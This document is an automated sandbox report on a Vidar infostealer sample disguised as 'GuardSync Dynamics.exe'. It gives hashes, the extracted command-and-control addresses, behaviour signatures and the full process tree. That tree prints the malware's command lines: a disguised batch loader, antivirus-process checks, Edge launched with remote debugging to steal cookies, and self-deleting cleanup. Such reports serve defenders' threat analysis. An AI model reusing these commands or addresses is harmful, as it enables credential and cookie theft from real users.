Analysis
- max time kernel: 288s
- max time network: 210s
- platform: windows10-2004_x64
- resource: win10v2004-20250619-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20250619-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 04/07/2025, 11:56
Static task: static1
Behavioral task: behavioral1
- Sample: 04072025_1156_GuardSync Dynamics.exe
- Resource: win10v2004-20250619-en
General
- Target: 04072025_1156_GuardSync Dynamics.exe
- Size: 3.0MB
- MD5: 96a3ecdd3e195998a31ebef46dd9aa94
- SHA1: 55063af085570e04530597917687a2d88af0df8e
- SHA256: 15d4376eb24c3a2090739087e51dd8c471520302948f33d7646218712e8ae1cb
- SHA512: a110f85476947dbb07f3196f36d0dd4c341d84f5437877084ff57c6046c763a2fb4c9e29b64852a02a75e476a52b4f79b5e659d53ccc442020f433eb0609b888
- SSDEEP: 24576:X0apgm6NGZ3rwcJZCH8pqK7U+nhrVMSyDzz08Var0N:XR6e3rxZCH8p5l3MSyY8VF
Malware Config
Extracted
vidar
14.4
6ac1b1b70ccb3c5ee2891e7c48f811ac
https://t.me/q0l0o
https://steamcommunity.com/profiles/76561199872233764
- user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/137.0.0.0 Safari/537.36 OPR/122.0.0.0
Signatures
-
Detect Vidar Stealer 44 IoCs
-
Vidar family
-
Uses browser remote debugging 2 TTPs 3 IoCs
Can be used to control the browser and steal sensitive information such as credentials and session cookies.
pid | Process
1488 | msedge.exe
5608 | msedge.exe
3032 | msedge.exe
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1567862796-3850854820-1319363977-1000\Control Panel\International\Geo\Nation | 04072025_1156_GuardSync Dynamics.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1567862796-3850854820-1319363977-1000\Control Panel\International\Geo\Nation | Opens.com
-
Executes dropped EXE 2 IoCs
pid | Process
2844 | Opens.com
4312 | Opens.com
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid | Process
3204 | tasklist.exe
3372 | tasklist.exe
-
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 2844 set thread context of 4312 | 2844 | Opens.com | 108
-
Drops file in Windows directory 4 IoCs
description | ioc | Process
File opened for modification | C:\Windows\LooksMail | 04072025_1156_GuardSync Dynamics.exe
File opened for modification | C:\Windows\AssembledRochester | 04072025_1156_GuardSync Dynamics.exe
File opened for modification | C:\Windows\TwinsArc | 04072025_1156_GuardSync Dynamics.exe
File opened for modification | C:\Windows\YesterdayArbitrary | 04072025_1156_GuardSync Dynamics.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | choice.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | timeout.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 04072025_1156_GuardSync Dynamics.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | findstr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | tasklist.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | tasklist.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | extrac32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Opens.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Opens.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | findstr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | findstr.exe
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Opens.com
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Opens.com
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | chrome.exe
-
Delays execution with timeout.exe 1 IoCs
pid | Process
228 | timeout.exe
-
Enumerates system info in registry 2 TTPs 6 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
-
Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133961039916338464" | chrome.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid | Process
4404 | chrome.exe
4404 | chrome.exe
4404 | chrome.exe
4404 | chrome.exe
1488 | msedge.exe
1488 | msedge.exe
-
Suspicious use of AdjustPrivilegeToken 13 IoCs
description | pid | Process
Token: SeDebugPrivilege | 3204 | tasklist.exe
Token: SeDebugPrivilege | 3372 | tasklist.exe
Token: SeDebugPrivilege | 2232 | powershell.exe
Token: SeShutdownPrivilege | 4404 | chrome.exe
Token: SeCreatePagefilePrivilege | 4404 | chrome.exe
Token: SeShutdownPrivilege | 4404 | chrome.exe
Token: SeCreatePagefilePrivilege | 4404 | chrome.exe
Token: SeShutdownPrivilege | 4404 | chrome.exe
Token: SeCreatePagefilePrivilege | 4404 | chrome.exe
Token: SeShutdownPrivilege | 4404 | chrome.exe
Token: SeCreatePagefilePrivilege | 4404 | chrome.exe
Token: SeShutdownPrivilege | 4404 | chrome.exe
Token: SeCreatePagefilePrivilege | 4404 | chrome.exe
-
Suspicious use of FindShellTrayWindow 30 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
pid | Process
2844 | Opens.com
2844 | Opens.com
2844 | Opens.com
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\04072025_1156_GuardSync Dynamics.exe"C:\Users\Admin\AppData\Local\Temp\04072025_1156_GuardSync Dynamics.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copy Chemical.accdt Chemical.accdt.bat & Chemical.accdt.bat2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5612 -
C:\Windows\SysWOW64\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"3⤵
- System Location Discovery: System Language Discovery
PID:4808
-
-
C:\Windows\SysWOW64\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3372
-
-
C:\Windows\SysWOW64\findstr.exefindstr "nsWscSvc ekrn bdservicehost SophosHealth AvastUI AVGUI & if not errorlevel 1 Set uHaokukEYZtcNWeSFxjvzPhzyHypEx=AutoIt3.exe & Set sGlHEpDvlr=.a3x & Set ualNAJcOnaXFfMtgoBuyuxABXcS=3003⤵
- System Location Discovery: System Language Discovery
PID:5360
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y Greg.accdt *.*3⤵
- System Location Discovery: System Language Discovery
PID:3160
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Pac" Insurance3⤵
- System Location Discovery: System Language Discovery
PID:5344
-
-
C:\Users\Admin\AppData\Local\Temp\362997\Opens.comOpens.com E3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Users\Admin\AppData\Local\Temp\362997\Opens.comC:\Users\Admin\AppData\Local\Temp\362997\Opens.com4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4312 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"5⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4404 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xf8,0xd4,0x7fff1ac1dcf8,0x7fff1ac1dd04,0x7fff1ac1dd106⤵PID:2120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1984,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=1976 /prefetch:26⤵PID:3668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1548,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=2256 /prefetch:36⤵PID:2328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2360,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=2536 /prefetch:86⤵PID:3048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=3176 /prefetch:16⤵PID:2540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=3200 /prefetch:16⤵PID:5428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4216,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=4232 /prefetch:26⤵PID:2676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4584,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=4644 /prefetch:16⤵PID:1768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5224,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=5236 /prefetch:86⤵PID:3168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5412,i,7521223809750548829,14109549565389027451,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=5428 /prefetch:86⤵PID:4456
-
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "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5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\srk120sy\srk120sy.cmdline"6⤵PID:4996
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9759.tmp" "c:\Users\Admin\AppData\Local\Temp\srk120sy\CSC4675495100C4005AB42373D525A8B8A.TMP"7⤵PID:5064
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1488 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7fff1b22f208,0x7fff1b22f214,0x7fff1b22f2206⤵PID:5336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1884,i,10922783306687028346,3727175597504534061,262144 --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:36⤵PID:816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2232,i,10922783306687028346,3727175597504534061,262144 --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:26⤵PID:1040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2544,i,10922783306687028346,3727175597504534061,262144 --variations-seed-version --mojo-platform-channel-handle=2568 /prefetch:86⤵PID:5636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3488,i,10922783306687028346,3727175597504534061,262144 --variations-seed-version --mojo-platform-channel-handle=3516 /prefetch:16⤵
- Uses browser remote debugging
PID:3032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3528,i,10922783306687028346,3727175597504534061,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:16⤵
- Uses browser remote debugging
PID:5608
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\hvai5" & exit5⤵
- System Location Discovery: System Language Discovery
PID:4128 -
C:\Windows\SysWOW64\timeout.exetimeout /t 116⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:228
-
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d n /t 53⤵
- System Location Discovery: System Language Discovery
PID:2300
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:5748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5108
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:3444
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:2148
Network
MITRE ATT&CK Enterprise v16
Defense Evasion
- Modify Authentication Process: 1
- Obfuscated Files or Information: 1
- Command Obfuscation: 1
Credential Access
- Credentials from Password Stores: 1
- Credentials from Web Browsers: 1
- Modify Authentication Process: 1
- Steal Web Session Cookie: 1
- Unsecured Credentials: 4
- Credentials In Files: 4
Downloads
-
Filesize
102KB
MD5420ac789e1a70cca7f3a3bd84eb199fb
SHA103defa4a28e115aecb410848b0f4391d06347018
SHA256e5e2f7437db91ec1d964a42059fbe1d5c4df411ec25a66029d15cfa92d44e4f1
SHA512f2dc3f9424d26c8294532407850885a227fae3363efa33ea25c54d2fb02f7905a2eb37ecc80f36def9c580e48c299eaddbc7933f5181fc32f3872e972d79462d
-
Filesize
92KB
MD52d06c150457e854cec25c1f213db238d
SHA137a8b8833b2e13fcd355ef72e8ebdb7f473a27a0
SHA25649eb14e0647a803fd452971d5f4d9754757a35d13c1547406c5d358867c0c3a4
SHA512df6a7bacbab123048b48d8a1a8cc823f7f1f25e39539a37fc9fe227993993d6d1f3ebf290f01aca322a3dfa0edf718d65ebd2ec693f9f86962f543d550491cbf
-
Filesize
68KB
MD5982414249bca89476e5c617d200928c7
SHA1807cea7865f10267c7c1ac24f6214cab68329216
SHA25671472523c602cd41ad39f5cbceee283e53ebc4cc36a8761990b6180215116f99
SHA512020b4de6963f5e6861117057951baf7b8690501faa41987a42606ef33a9df7dc4ef022e0c48627bfa27685dfa2dab28ef1a4fd2783b05fda228c91697252dff3
-
Filesize
132KB
MD5f7819d7e5c4802738ab703e2e37bab00
SHA115c6dc7a08f06d4ff3b24016eff33c3fbc95c15c
SHA256a06d3c5bef01f4079eb38532ba52b6cb6dbbca986b56f9aad3188c3efab12808
SHA512da426800099c7182c946c844675af88d20c46e98e6726e8a8e0686db0d7ed2b468683139c932769df4e7b4d154601d16eae1040cf99082a5e5b072d0cedba009
-
Filesize
36KB
MD50f9de477eaaeedf2bf560855e4d9c41d
SHA1f1a44aa93484daea0b66a059fea5a77b85160bf2
SHA256e18035f64ad33f4e5c889e1d372dd637678f07c17048a2a66093d7db4f59c46f
SHA51261fd92b37c82e372fa858429dd9fadd8ec485fc2835d8dca0db2193e373b06ee9f25733e36ff7ed7173afb8c6fe9441c52b2291c9049c1b87f9f07f8e2d83dd2
-
Filesize
96KB
MD566c9280669285ae91156617346f50dca
SHA14e57f37d8160197dd47ab9a68db0303ce8e8c73d
SHA2560dde03e3cdfb18fc3c191a3382b33fb19895204e382bbb52096c6090cd4aef52
SHA512e05115c3d450d129475015462f3da17a409a65ec93b6bc3535c0af4607dea1e7563b96e56e03116809edc8feeb02373afc25070f83695f03f22dd52af07926e8
-
Filesize
477KB
MD5e9112b18a77b6fc36eeacd49ddaa17de
SHA1f74c5eb09c000032f1a776473ec4265b5bfb727e
SHA256e0048a02d7af7d10ad338fc716c2bd795d68390492b8b6efc7f8f9d9ab4662ed
SHA5129ea9f1365727777e11df53856eecefcec6acad6c541f2b31d81172994dda99f5482e8907848487c677b007c07ea648dd821697f78129cf2097ef2b746e2ae147
-
Filesize
64KB
MD5b1cad26d14ca191e0230cf18c57cf847
SHA111a8ca6e748b414d177d0d0361061953a679282e
SHA256871328e439489119c2a383a84414bddd7de930ba0532d7a53fc96ce76c4b4f87
SHA51257cd337a318b8799b0876cb302ab00dd4f60e76173f4cf1b521f9c868f40e5c1a7228eadec2658cf8effe78752c66e6d472c29e2dfec3f3acd184bcf935d747e
-
Filesize
1KB
MD574bd1c4148631e1ed1a6db2b2ca9afc8
SHA14af73af903781c4be5e8533aa652ddb990f53a41
SHA25601edc7e5b912222de49ef423044efc8075f6c2de30081ba06ed5e4e3b670028f
SHA5128f391fa81a206ceacd2debc887f03b4c491f99c91d9c6940e30ef6014c8f4ea700adf755ce0263ea276c0e804554c33cb6bd42f999b5f19bcd22b0c4a42ba506
-
Filesize
63KB
MD5485fb732995db1037c59c8fa3b22c557
SHA101a5b6079d0da4d5a2a7bde8b31bbe5619cc255f
SHA25669f7a5292ab0c3b77f664664c27ce27b654569a3b8d8d4fb10ecd7a7badcb84a
SHA512f53823d07f1bb4c8b0f1f9bf05160c8ce951ebf17f65eb140baf914b3f153f1ede3492775551a2164b2bc17206aee8d09550da5bc826bcc504033ecd1a27039e
-
Filesize
49KB
MD5b88d6b64e0e7bb7a3dccd3a30d3a0d17
SHA1fed7e297df3f396a39e41b7f5175254eec06327e
SHA256645ad3763009649e2e2944bf783e893805a28c3b20111d73a4e4fef319faf8ba
SHA512d87cfa60f456e0bf13cb798550baf3debc7836f88dac347e10f07a469e8daa2acc68ce8d92f9c6bab145e0be445772e925ab0a48982e5a1ab287f88973478740
-
Filesize
112KB
MD5b56339241e5506488d18ea506dea80b2
SHA1f00536c89de15f999c9abb17a000e7c5fd4e20aa
SHA25608e6c2f81e55de108a5d7008468cb9d5edcc13cd93a072110f4d60904252475d
SHA5121c35f54b254e2c3f463974857d0dad2bd0829c93e6950594ac05eff90ea66a55ec09fecb193102f8add090fb73aef26815724d81320f65afa91a4b86beef68e0
-
Filesize
66KB
MD5c548afe163c6a7c351cd8741dc953c8a
SHA165932b80365df879d7125ec6050393326ff8a4da
SHA256a12c4b220138025c8d4a2d28f91dba9b436ddf19e2013e79c1a13fb64f43deee
SHA512077ff26863f9c6d20ebd7da036b5fb4bf2847a71232f615d099c9de790c678692d0444238463e1497aedc354d87927600a0c3276fe73d0966902546c7ceaf98f
-
Filesize
1KB
MD547705f1ebd2f9c056da642ae52755be6
SHA1f931d40a00b841699b6e03140708a58c91970293
SHA256409fa62620c65cac90c8a5e95f6fc5de187a2c001921f4f4f20ed1316c5d6b03
SHA512d8116423b68281bf1d156de8bd2b6d263d9646bd9617626d184592a2028d78d39819edecb572764da20882cf3b09413d14e52abcc1da435c941d0b4d8a5ddbe3
-
Filesize
96KB
MD588bf313841c84c4baa65f75aa5ec18b4
SHA1d833b019a2703f77cf657bd0b1829702900b2e31
SHA256df04629f43bdb4520803e6851fa9012f16a7fbb9e3f07aa9cc01f11719d7bca1
SHA512081af238d98ab21149f29f31eca5093c2008d3e06018f9627e80c3d6da00650c27f62c85f3bae1fb59a7f734c6ffe623ad56b78f9c14de94e88e76f9420317d7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5461138d42e563fe3945fad37e865b3b6
SHA1c0167cb76097ddad08d854aada38c30b1efe13e8
SHA25617f6011e6865e469e8e17bf0617eac159ba679d000a2c8b5c324eaae50a1a9a5
SHA51262bb548be488016d2e0fa8a4c940a1dba47d7d1767d5dcdb4f564b853534f119e661d2d33ecc07d0383e42237d396111239077ca9f08583870c69e49ce9229bb
-
Filesize
36KB
MD540a13f9b39d6d3e649cf21f1b47da9ad
SHA1b03d7f8ad2f90c61063e54cf45c01677f6a86942
SHA2563cd5effba4bc90a72efe5e97609c962dd91d5b50e41f13bfa0f5606d322a5278
SHA5127e821747ca4db1654c3ce01e31bc0bddfeb092464b0dea9aa8d5370c01dc0fc141fedcd168553c502a417b7703ced120ff53448c4135338cdff937a6f5f9cd5b
-
Filesize
652B
MD5c4a050738996491c25c2f9efc061e8e6
SHA14864a2a4eb37beca665832c34875e48b74099ce9
SHA256010570dda945d574e31bac7b200c9fbbf8599aace6f9f9c89595e60589827b8b
SHA5122f573a57f5451addd7f11372ab16f91082efbc6f960e451e1cf3f2365a7b2c275cb1665299f195a49c94a994cc4cce651f3bb3c58e8283ba32b86e5c58ff88cd
-
Filesize
1KB
MD53d1018b223caf0c61982a29cb26996cc
SHA1743fd8c82380e7d72ec1cb2e05f149e148874b0e
SHA256786a71b68cee9392682824e67abfb89e5ec70ee6fb37213491b5c9a95ac59c92
SHA5127a632143e76410669fff27e2fa184d572a788e9d315f7c2415c7013cb07026678fe1b3e4fb1a77411f82941d7a03c64632c07d3fc1398e2df5741471b9462980
-
Filesize
369B
MD556e58e215a61cebc396d03fabf1e748f
SHA122302d156e8a69a5ee7385bef4c14243a58968b9
SHA25689e441f97b5de262c1719515bfde3d7429b9aa504225167266f464b5b7acd4aa
SHA5122122ddda49b71f85c450b95fee0510e3b853493bab9f2b4502bfeb4cf93120feba0aa8b6970cdf53616afd9acb3337137bf21767db490fd063c76d91f40d4bf7